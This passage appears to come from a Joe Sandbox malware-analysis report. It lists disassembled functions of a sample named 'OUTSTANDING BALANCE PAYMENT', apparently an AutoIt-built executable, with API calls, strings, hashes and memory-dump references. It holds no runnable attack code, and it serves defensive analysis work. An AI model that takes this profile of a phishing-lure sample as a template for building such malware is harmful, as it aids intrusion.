                                                          • Opcode ID: 1672867058b439c58959f9b28ba2563f235a646f37293f8b31e55849bdb1f008
                                                          • Instruction ID: cf1abf8c82ffaaa69c05a0f3166fde518574ee3a4127e2d7b0738e6439edbba4
                                                          • Opcode Fuzzy Hash: 1672867058b439c58959f9b28ba2563f235a646f37293f8b31e55849bdb1f008
                                                          • Instruction Fuzzy Hash: 71119DB1210208AFFF259E54DC84FAB37AAEB883A4F104169F9189B2A0D6719C528760
                                                          APIs
                                                            • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                            • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                            • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                          • GetWindowRect.USER32(00000000,?), ref: 00BC9968
                                                          • GetSysColor.USER32(00000012), ref: 00BC9982
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: bac14e138473468e0e8f8671197097a7db0561252e2d6780afd579407e5dd6ea
                                                          • Instruction ID: 288971fd73bf1d9f7cd23400b71f4a76ece510bec9676fe402a88fe7f9e0afc9
                                                          • Opcode Fuzzy Hash: bac14e138473468e0e8f8671197097a7db0561252e2d6780afd579407e5dd6ea
                                                          • Instruction Fuzzy Hash: E5114772520209AFDB04DFB8C849EEA7BE8EB08354F05462CF955E3150D674E850DB60
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00BC9699
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BC96A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 9c61339123618332d9f1c2fef007ac71b420172e8760a8991409b3a937fb7b28
                                                          • Instruction ID: 1cde8aad448a40141391778449cd7763763cf8f9d2e29d107cded5d704173612
                                                          • Opcode Fuzzy Hash: 9c61339123618332d9f1c2fef007ac71b420172e8760a8991409b3a937fb7b28
                                                          • Instruction Fuzzy Hash: 80116A71500108ABFB119FA4DC88FEB3BAAEB153B8F504368FA65971E0C771DC519760
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BA52D5
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BA52F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 5fbcbd06aa4209014500410cedf6d83d4086b480557ceac00b48e95a9ac5fb4c
                                                          • Instruction ID: 17d4dbfb6293da296ea1324bcfe2023186570b8151e830c5bd9952052b82757f
                                                          • Opcode Fuzzy Hash: 5fbcbd06aa4209014500410cedf6d83d4086b480557ceac00b48e95a9ac5fb4c
                                                          • Instruction Fuzzy Hash: FD11D072905714BBDF30DA98D944B9D77E8EB86790F0900A5E942E72A0D7B0EF05CBA0
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BB4DF5
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BB4E1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 9e4127fcae1f3d6c1e3fdad91e9d0f21a02ddff5df318e0b18676127691561f6
                                                          • Instruction ID: dfe4654b7c25e336420f9dff74a87f2f7adc9c0c45e674336d7eeb93e90d6ac2
                                                          • Opcode Fuzzy Hash: 9e4127fcae1f3d6c1e3fdad91e9d0f21a02ddff5df318e0b18676127691561f6
                                                          • Instruction Fuzzy Hash: 8711AC70501221BBDB298F61C8C9EFBFAE8FF06755F10826AF51596141D7F09D80C6E0
                                                          APIs
                                                          • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                          • htons.WSOCK32(00000000,?,00000000), ref: 00BBA88B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: htonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 3832099526-2422070025
                                                          • Opcode ID: 84e2483de7a955b42a8ca150a3f5600d3375134d0abbb9e7a019bda08ebea9fa
                                                          • Instruction ID: 3ba306fe85e99531d56c7c227b273aae317613ad9e87900ee37902cde88f184e
                                                          • Opcode Fuzzy Hash: 84e2483de7a955b42a8ca150a3f5600d3375134d0abbb9e7a019bda08ebea9fa
                                                          • Instruction Fuzzy Hash: 7B01C075600304ABCB11AF68CCC6BF9B7A4EF45314F1085AAE5169B6D1DAB1E8058752
                                                          APIs
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B9B7EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: 38489ed8a7a8391627ded5fc9c601b153e964feaf225fd82649dc8645c2e2c6f
                                                          • Instruction ID: 517660ffdd232253d491e49b842490d68bbde649194b1e9a4fbe6ca38c8f64bb
                                                          • Opcode Fuzzy Hash: 38489ed8a7a8391627ded5fc9c601b153e964feaf225fd82649dc8645c2e2c6f
                                                          • Instruction Fuzzy Hash: 0701F171600118ABCF04EBA4DC82DFE33E9AF06310B04066CF4A2672D2EB7868189790
                                                          APIs
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B9B6EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: efda0cfc4e80c3220091d4c7aed1ff1b46b480f6c05d81bf5803db04fe85abbb
                                                          • Instruction ID: 93bcbc4db79e5ca1e5673c03dc79e973d3dc30ed6bdbe943c8ccb01e4340dfcc
                                                          • Opcode Fuzzy Hash: efda0cfc4e80c3220091d4c7aed1ff1b46b480f6c05d81bf5803db04fe85abbb
                                                          • Instruction Fuzzy Hash: F701A275641008ABCF04EBA4DA52EFE77F89F15340F1400B9B442B3181DB986E1897B5
                                                          APIs
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B9B76C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: 587f4a7d6fe8a258408f60b931070840d1e800b90e9459ca3b54bde0d6aff627
                                                          • Instruction ID: 6f8b97f5a2f61a3f1bd03ca64922bd902c43960c1aa3cc820a4bf2bed04cbbc6
                                                          • Opcode Fuzzy Hash: 587f4a7d6fe8a258408f60b931070840d1e800b90e9459ca3b54bde0d6aff627
                                                          • Instruction Fuzzy Hash: A301D1B5640108ABCF00EBA4DA82EFE73EC9F15340F140179B442B3192DBA95E1997B5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 4f9004fd9b4c1d7bd62ebd058e50f07b5021f520f7dfbc905437c5def51e2d4c
                                                          • Instruction ID: 5217cda785111e43cb09dc78ffb846b5d64afcad5ad12c9bfa720f711949af88
                                                          • Opcode Fuzzy Hash: 4f9004fd9b4c1d7bd62ebd058e50f07b5021f520f7dfbc905437c5def51e2d4c
                                                          • Instruction Fuzzy Hash: 15E092776043642BDB20EAA99C49FCBFBACEB52764F0000A6B915D3051DA74AA4287D0
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B9A63F
                                                            • Part of subcall function 00B813F1: _doexit.LIBCMT ref: 00B813FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 4af61631ad3e28610e886061f18c0f589882b1f8fb14afc68304686c3e0eca9c
                                                          • Instruction ID: 5f61926cc57e8024fadc6114c774ecb927c45de8d58dcbabb9d0f5643ea9aee7
                                                          • Opcode Fuzzy Hash: 4af61631ad3e28610e886061f18c0f589882b1f8fb14afc68304686c3e0eca9c
                                                          • Instruction Fuzzy Hash: 76D02B313C031833C31036AC6C0BFD836CC8B15F51F0440A5BB0C9A1D24DD2C69042DD
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00BDACC0
                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00BDAEBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFreeLibrarySystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 510247158-3257408948
                                                          • Opcode ID: 8003d159634095a7e39d6806a989473f5cf400ef434988646dbd7d6316a912fa
                                                          • Instruction ID: 9d9c71fbf56343e67d985e1f5d5fb7dc798a7ace2318c6b6edd0a08977ea6f2b
                                                          • Opcode Fuzzy Hash: 8003d159634095a7e39d6806a989473f5cf400ef434988646dbd7d6316a912fa
                                                          • Instruction Fuzzy Hash: 5EE0C975C24549AFDB11DBA5DD84AECF7F8EB48301F1880C6E116B6660EB705A84DF22
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC86A2
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BC86B5
                                                            • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: b7abcbaf789e121edd1c2a8ad1b89c43c3230e92b578edc699cee9575e468e7d
                                                          • Instruction ID: 8ebc469d474ec23765bed53a3423ede9698e5718543d1975c5fca4e158ae127e
                                                          • Opcode Fuzzy Hash: b7abcbaf789e121edd1c2a8ad1b89c43c3230e92b578edc699cee9575e468e7d
                                                          • Instruction Fuzzy Hash: 5CD0123138C394BBE6646770DC4BFC67A589B15B11F110925B749AF1D0CDF4E940CB54
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC86E2
                                                          • PostMessageW.USER32(00000000), ref: 00BC86E9
                                                            • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 53657d4d2a71802ebc17b5989eb34ea28b246881dfe2aeafc027bab6756e174c
                                                          • Instruction ID: 430ca343a8c3a5a1fc8bf518b31ee07475c5f6326f4cda52c306d59069de84cd
                                                          • Opcode Fuzzy Hash: 53657d4d2a71802ebc17b5989eb34ea28b246881dfe2aeafc027bab6756e174c
                                                          • Instruction Fuzzy Hash: 29D0A9313883947BE22463309C4BFC66A489B05B10F000824B205AE0C0CCE0A9408B14